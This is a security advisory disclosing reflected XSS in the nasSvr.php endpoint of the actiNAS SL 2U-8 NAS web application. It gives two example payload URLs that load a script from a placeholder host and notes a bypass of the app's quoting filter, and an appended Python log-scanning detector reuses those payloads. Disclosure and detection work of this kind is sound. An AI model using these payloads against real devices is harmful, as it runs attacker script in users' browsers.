Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.
Affected: the web application, version 3.2.03-SP1, of the actiNAS Plus SL 2U-8 RDX.
Product link: https://www.actidata.com/index.php/de-de/actinas-plus-sl-2u-8-rdx
Eduard Agavriloae
The web application is prone to reflected XSS through the /nasSvr.php endpoint via two query parameters: func and op. A payload injected into either parameter is rendered on the client inside a message similar to one of the following, depending on which parameter was used:
Option <payload> not match in Account Manager!
func:<payload> not match in nasSvr!
If the payload contains string delimiters such as ' or " with whitespace between them, the web application modifies the payload by adding string delimiters before and after the whitespace, which affects the payload's execution.
However, this can be easily bypassed by directly injecting a script HTML tag with an arbitrary source, which essentially allows JavaScript code to be executed without restrictions. Alternatively, payloads without whitespace between string delimiters can be used.
Example payloads:
/nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
/nasSvr.php?func=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E
My feeling is that other versions are affected as well, but I didn't find other instances of this product in order to validate.
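A detection-side check for the behaviour described above, added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for requests to /nasSvr.php whose func or op value decodes to markup characters. The combined log format, the sample lines and the op value `list` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that indicate markup or attribute breakout in a reflected value.
MARKUP_RE = re.compile(r"[<>\"']")
ENDPOINT = "/nasSvr.php"
WATCHED_PARAMS = ("func", "op")  # the two reflected parameters named in the advisory

def suspicious_params(log_line):
    """Return (param, decoded_value) pairs for func/op values that carry markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith(ENDPOINT):
        return []
    # parse_qs percent-decodes once, mirroring normal query-string decoding.
    query = parse_qs(url.query, keep_blank_values=True)
    return [(name, value)
            for name in WATCHED_PARAMS
            for value in query.get(name, [])
            if MARKUP_RE.search(value)]

def scan(lines):
    """Return (line_number, param, decoded_value) for every suspicious request."""
    return [(number, name, value)
            for number, line in enumerate(lines, start=1)
            for name, value in suspicious_params(line)]

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /nasSvr.php?func=accountMgr&op=list HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /nasSvr.php?func=accountMgr&op=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] '
    '"GET /nasSvr.php?func=%3Cscript%20src=https://your-web-server.com/payload.js%3E%3C/script%3E HTTP/1.1" 200 630',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] '
    '"GET /index.php?op=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name} = {value!r}")
```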